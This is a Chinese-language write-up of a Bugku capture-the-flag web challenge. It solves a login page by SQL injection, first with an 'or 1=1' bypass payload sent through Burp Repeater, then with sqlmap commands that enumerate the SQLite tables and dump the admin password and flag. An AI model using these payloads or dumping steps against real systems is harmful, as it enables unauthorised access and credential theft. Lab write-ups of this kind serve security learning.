Bugku CTF_Web——my-first-sqli
进入靶场

随便输一个看看

点login没有任何回显
方法一:
上bp抓包

放到repeter测试

试试万能密码(靶机过期了重新开了个靶机)
'admin or 1=1--+

shellmates{SQLi_goeS_BrrRrRR}
方法二:
拿包直接梭哈sqlmap
爆库
python sqlmap.py -r "***.txt"  --dbs

接着爆表
python sqlmap.py -r "***.txt"  -D SQLite --tables
+-------+
| users |
+-------+

爆字段
python sqlmap.py -r "***.txt"  -D SQLite -T users --columns
+----------+------+
| Column   | Type |
+----------+------+
| password | TEXT |
| username | TEXT |
+----------+------+

读取字段
查看username和password
python sqlmap.py -r "***.txt"  -D SQLite -T users -C username --dump
+----------+
| username |
+----------+
| admin    |
+----------+

接下来读取password就行了
python sqlmap.py -r "***.txt"  -D SQLite -T users -C password --dump
+----------------------------------------+
| password                               |
+----------------------------------------+
| sYbtomeoGjP62xPS05wqHY5R7cZqFW5jD0Cg6w |
+----------------------------------------+

登录试试


拿到flag
shellmates{SQLi_goeS_BrrRrRR}




















